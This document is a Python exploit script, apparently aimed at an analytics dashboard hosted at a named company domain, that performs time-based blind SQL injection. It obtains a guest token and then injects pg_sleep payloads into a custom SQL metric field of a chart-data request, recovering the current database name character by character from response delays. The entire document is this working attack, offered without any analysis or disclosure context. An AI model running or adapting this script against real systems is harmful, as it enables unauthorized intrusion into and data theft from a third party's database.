import requests import json import string import copy import time import os printable_chars = list(map(ord, string.printable)) + [0] dashboard_token = None extracted = '' default_time = 2 patokan_karakter = 1 def getSetToken(): global dashboard_token url = "https://xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/xxx/v1/xxxxxxxx/xxxxxxxxxxx/xxxxxxxxxxxxxxxxxxxxxxxx" headers = { "Host": "xxxxxxxxxxxxxxxxxxxxxx "Sec-Ch-Ua-Platform": '"macOS"', "Authorization": "Bearer xxxxxxxxxxxxx", "Accept-Language": "en-US,en;q=0.9", "Sec-Ch-Ua": '"Chromium";v="135", "Not-A.Brand";v="8"', "Content-Type": "application/json", "Sec-Ch-Ua-Mobile": "?0", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36", "Accept": "*/*", "Origin": "https://xxxxxxxxxxxxxxxxxxxxxx", "Sec-Fetch-Site": "same-site", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Dest": "empty", "Referer": "https://xxxxxxxxxxxxxxxxxxxxxx/", "Priority": "u=1, i" } payload = {} try: response = requests.post(url, headers=headers, json=payload) if response.status_code == 200: try: response_data = response.json() dashboard_token = response_data.get("data", {}).get("dashboardToken") except json.JSONDecodeError as e: print(e) except requests.exceptions.RequestException as e: print(e) except requests.exceptions.RequestException as e: print(e) def doExtraction(): global dashboard_token, default_time, patokan_karakter, extracted base_url = "https://xxxxxxxxxxxxxxxxxxxxxx/xxxxxxxxxxxxxxxxxxxxxx/xxxxxxxxxxxxxxxxxxxxxx/xxxxxxxxxxxxxxxxxxxxxx/xxxxxxxxxxxxxxxxxxxxxx" query_params = { "form_data": json.dumps({"slice_id": 241}), "dashboard_id": "40", "force": None } headers = { "Host": "visual.jubelio.com", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:138.0) Gecko/20100101 Firefox/138.0", "Accept": "application/json", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "Referer": "https://xxxxxxxxxxxxxxxxxxxxxx/xxxxxxxxxxxxxxxxxxxxxx/xxxxxxxxxxxxxxxxxxxxxx", "X-Csrftoken": "", "X-Guesttoken": dashboard_token, "Content-Type": "application/json", "Origin": "https://xxxxxxxxxxxxxxxxxxxxxx", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "same-origin", "Sec-Fetch-Site": "same-origin", } template = { "datasource":{"id":50,"type":"table"}, "force":False, "queries":[{ "filters":[{"col":"transaction_date","op":"TEMPORAL_RANGE","val":"No filter"},{"col":"doc_type","op":"==","val":"INV"}], "extras":{"having":"","where":""}, "applied_time_extras":{}, "columns":[], "metrics":[{ "aggregate":None, "column":None, "datasourceWarning":True, "expressionType":"SQL", "hasCustomLabel":True, "label":"total_penjualan", "optionName":"metric_26ts8mn0vq5_t0crgans0e", "sqlExpression":"" }], "orderby":[[{"aggregate":None,"column":None,"datasourceWarning":True,"expressionType":"SQL","hasCustomLabel":True,"label":"total_penjualan","optionName":"metric_26ts8mn0vq5_t0crgans0e","sqlExpression":"coalesce(SUM(penjualan), 0)"},False]], "annotation_layers":[], "row_limit":10000, "series_limit":0, "order_desc":True, "url_params":{"?uiConfig":"10","days":"14","endDate":"2025-05-14T16:59:59.059Z","expand_filters":"false","startDate":"2025-04-30T17:00:00.000Z","uiConfig":"11"}, "custom_params":{}, "custom_form_data":{} }], "form_data":{ "datasource":"50__table", "viz_type":"handlebars", "slice_id":241, "url_params":{"?uiConfig":"10","days":"14","endDate":"2025-05-14T16:59:59.059Z","expand_filters":"false","startDate":"2025-04-30T17:00:00.000Z","uiConfig":"11"}, "query_mode":"aggregate", "groupby":[], "metrics":[{"aggregate":None,"column":None,"datasourceWarning":True,"expressionType":"SQL","hasCustomLabel":True,"label":"total_penjualan","optionName":"metric_26ts8mn0vq5_t0crgans0e","sqlExpression":"coalesce(SUM(penjualan), 0)"}], "all_columns":[], "percent_metrics":[], "order_by_cols":[], "order_desc":True, "row_limit":10000, "server_page_length":10, "adhoc_filters":[ {"clause":"WHERE","comparator":"No filter","datasourceWarning":False,"expressionType":"SIMPLE","filterOptionName":"filter_vztukh6q0g_sq1zlze9z5","isExtra":False,"isNew":False,"operator":"TEMPORAL_RANGE","sqlExpression":None,"subject":"transaction_date"}, {"clause":"WHERE","comparator":"INV","datasourceWarning":False,"expressionType":"SIMPLE","filterOptionName":"filter_qzite23eqyf_csg3677vtr","isExtra":False,"isNew":False,"operator":"==","operatorId":"EQUALS","sqlExpression":None,"subject":"doc_type"} ], "handlebarsTemplate":"
\n

{{formatCurrency data.[0].[total_penjualan] code='IDR' locale=\"id\"}}

\n
", "styleTemplate":"/*\n .data-list {\n background-color: yellow;\n }\n*/\n{{data.[0].[SUM(penjualan)]}}", "dashboards":[40], "extra_form_data":{}, "label_colors":{}, "shared_label_colors":{}, "color_scheme":"jubelio_v2_dashboard", "extra_filters":[], "dashboardId":40, "force":None, "result_format":"json", "result_type":"full" }, "result_format":"json", "result_type":"full" } dict_template = copy.deepcopy(template) character_found = False try: while True: for char in printable_chars: if char == 0: print(f"[!] end of position {patokan_karakter}") raise StopIteratio payload = f"(SELECT pg_sleep({default_time}) WHERE ASCII(SUBSTRING(current_database(),{patokan_karakter},1)) = {char})" dict_template["queries"][0]["metrics"][0]["sqlExpression"] = payload start_time = time.time() response = requests.post(base_url, params=query_params, headers=headers, json=dict_template) end_time = time.time() duration = end_time - start_time auth_failures = 0 if response.status_code in [401, 403]: auth_failures += 1 if auth_failures > 5: print("[!] Too many auth failures") os._exit(1337) getSetToken() continue print(f"[*] patokan = {patokan_karakter}. [*] karakter hex('{hex(char)}'). [*] karakter ascii('{char}'). [*] takes = {duration:.2f} detik. [*] default_time = {default_time}.") if duration >= default_time: if response.status_code == 200: print(f"[+] {patokan_karakter} = '{chr(char)}'") extracted += chr(char) default_time = 2 character_found = True patokan_karakter += 1 break else: os._exit(1337) character_found = False if not character_found: default_time += 1 if default_time > 10: print(f"[+] extracted = {extracted}") break elif patokan_karakter > 256: print(f"[+] extracted = {extracted}") os._exit(1337) except requests.exceptions.HTTPError as http_err: print(http_err) dashboard_token = None os._exit(1337) except requests.exceptions.RequestException as e: print(e) dashboard_token = None os._exit(1337) except json.JSONDecodeError: dashboard_token = None os._exit(1337) finally: print(f"[+] extracted = {extracted}") os._exit(1337) if __name__ == "__main__": getSetToken() doExtraction()